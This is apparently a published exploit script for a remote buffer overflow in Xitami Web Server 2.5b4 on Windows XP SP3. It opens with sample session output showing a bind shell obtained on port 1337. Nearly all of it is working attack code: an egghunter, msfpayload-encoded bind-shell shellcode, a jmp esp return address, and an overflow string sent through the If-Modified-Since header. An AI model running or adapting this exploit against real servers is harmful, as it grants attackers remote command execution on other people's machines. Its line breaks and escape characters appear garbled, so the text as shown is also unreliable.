# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)# Date: June 4, 2011# Author: Glafkos Charalambous# Version: 2.5b4# Tested on: Windows XP SP3 En# Discovered by: Krystian Kloskowski## root@bt:~/Desktop# python xitami.py 192.168.0.24 80# [+] Connected# [+] Sending payload...# [+] Check Port 1337 for your shell# root@bt:~/Desktop# telnet 192.168.0.24 1337# Trying 192.168.0.24...# Connected to 192.168.0.24.# Escape character is '^]'.# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:/Xitami>ipconfig# ipconfig## Windows IP Configuration### Ethernet adapter Local Area Connection:##        Connection-specific DNS Suffix  . : #        IP Address. . . . . . . . . . . . : 192.168.0.24#        Subnet Mask . . . . . . . . . . . : 255.255.255.0#        Default Gateway . . . . . . . . . : 192.168.0.1## C:/Xitami>import timeimport socketimport sysif len(sys.argv) != 3:    print "Usage: ./xitami.py <Target IP> <Target Port>"    sys.exit(1)target = sys.argv[1]port = int(sys.argv[2])egghunt = ("/x66/x81/xCA/xFF/x0F/x42/x52/x6A/x02""/x58/xCD/x2E/x3C/x05/x5A/x74/xEF/xB8""w00t" # 4 byte tag"/x8B/xFA/xAF/x75/xEA/xAF/x75/xE7/xFF/xE7")# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b '/x00/x0a/x0d' -e x86/shikata_ga_nai -c 7 -t cshellcode = ("/xba/xa2/xcf/xad/x8d/xdb/xd1/xd9/x74/x24/xf4/x5e/x29/xc9/xb1""/x7e/x83/xee/xfc/x31/x56/x11/x03/x56/x11/xe2/x57/x70/xe4/x08""/x09/x2d/x2e/xd1/xec/x46/xf5/x22/x56/x96/x3c/x7b/x1e/x5b/x7e""/x78/xef/x23/x71/x82/x3e/x5f/xf1/xd3/x58/x3b/x53/x30/xe6/xbc""/x82/xb3/xba/xf5/xdf/x9e/x21/x78/xcd/x8d/x25/x87/x5b/xd4/xfd""/x6c/xcd/xcf/x7b/x68/x84/x3d/x07/xcb/x1e/x1b/x06/x11/x31/xfd""/x90/x27/xff/xe6/x22/x4d/xdd/x1a/xc9/xe1/x93/x45/x4b/x13/x48""/x74/xcc/x45/x07/x95/xd1/x38/xde/xa3/xef/x7d/x68/xb0/xd1/x67""/x60/xe5/x89/xb5/xf7/x3e/x2f/x49/xd7/xb8/xc0/xc6/x1b/xfc/xe2""/xbb/xc8/xae/x39/x78/x81/x4d/xc4/x1c/x2d/x16/x6d/xc3/x04/xde""/x58/x43/x4e/xc5/x60/x46/x4b/xc9/x79/xfb/x32/xdd/x46/xb8/xd4""/x61/x62/x92/xf6/xe8/x7b/xe8/x41/xc0/xee/xe2/xbb/x64/x6c/xb8""/x43/x2d/xfd/xda/x61/xb0/x7c/xe6/x36/xab/x3e/x7a/x80/xe6/x60""/x2b/x52/x1d/x53/xed/xb4/x94/x86/x8b/x66/x26/x56/x67/xe0/x7c""/xfb/x1c/xb9/x4f/x75/x4e/x7d/x63/xac/xbc/x7e/x90/xfd/xa1/xb2""/x6b/x06/xb4/x92/x1f/x90/x26/x1a/x4f/x3d/x18/xa2/x3c/x72/x0f""/x93/x37/xf7/xf3/x5a/x7f/x33/xbf/x9f/xc2/xea/xb9/x13/x6c/x77""/xb6/xd4/xc0/x37/x86/x78/xd3/x86/x8c/x9f/x3a/x0f/xb1/x5e/x0f""/xb9/x09/xf1/x0c/xe9/x2f/xb7/xd7/xea/x37/x4f/x6a/xc3/xdb/x7b""/x48/x32/x05/xd4/x48/xcc/x47/x59/x41/xc5/x0b/xf5/x02/xeb/x06""/x7f/xae/x25/x2b/x16/x2d/x51/x18/x91/x9c/x96/x32/x17/x1c/x6e""/x95/xb9/x4e/xf5/xa6/x29/x8b/x30/x48/x07/x55/xf1/xe4/xa8/xe2""/x4d/xe0/x6a/xef/xd3/x4e/x07/x4d/xb2/x25/xe0/xb2/x33/x1b/xdc""/x50/xac/x59/x35/xd9/x91/x9c/x44/x5a/xc1/x52/x19/x0f/x03/xc9""/x1d/x71/xe5/x79/x54/x3d/xc0/x87/x4d/x9f/x9d/x69/x09/xd4/x6b""/xe2/xa5/xe0/x77/xd0/xb9/xbd/x85/xd0/x35/xcb/x59/x78/x22/xf2""/x25/x78/x64/xf6/x2a/x8d/x3e/xc8/xce/x7c/x6f/x64/x24/xb4/x2c""/x14/xd5/xff/x9c/x84/x40/xf1/x74/xcf/x3c/x4f/xac/x2c/xe2/xae""/xaa/xaf/xb0/xcf/xc8/x31/x30/xb3/xb0/x8b/x08/x25/x2d/x95/x3d""/xf5/x0c/x1f/x23/xd9/x87/x31/x79/xd2/x8d/xad/x59/xdd/xb0/x4c""/xa4/x17/xeb/x97/xb0/x90/x3c/x45/xb7/x3f/x2b/x04/xf3/xc6/xe8""/x56/x25/x7a/xfd/x6e/x3b/xef/x64/x14/x9b/x67/x08/x9c/x47/x73""/x24/x1e/x1e/xc6/xd2/xad/xcc/x0c/xc8/xbb/x4e/x12/xde/xf5/x35""/x25/xe0/xb0/xef/x04/xb5/x29/x62/xc6/x56/x44/x52/x16/xa3/x63""/x63/xcd/xd1/xc9/x45/x87/x3b/xd6/x4b/x7a/x24/xd5/xd4/x7d/x4c""/x83/x06/x16/x88/x7f")jump = "/xeb/x22" # short jumpbuf = "A" * 72                  buf += "/xD7/x30/x9D/x7C" # jmp esp (user32.dll) / XP SP3 Englishbuf += jumpbuf += "/x90" * 50buf += egghuntbuf += "w00tw00t" # tagbuf += shellcodeheader = ('GET / HTTP/1.1/r/n''Host: %s/r/n''If-Modified-Since: pwned, %s/r/n''/r/n') % (target, buf)s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:    s.connect((target, port))    print "[+] Connected"except:    print "[!] Connection Failed"    sys.exit(0)print "[+] Sending payload..."s.send(header)time.sleep(1)s.close()print "[+] Check port 1337 for your shell"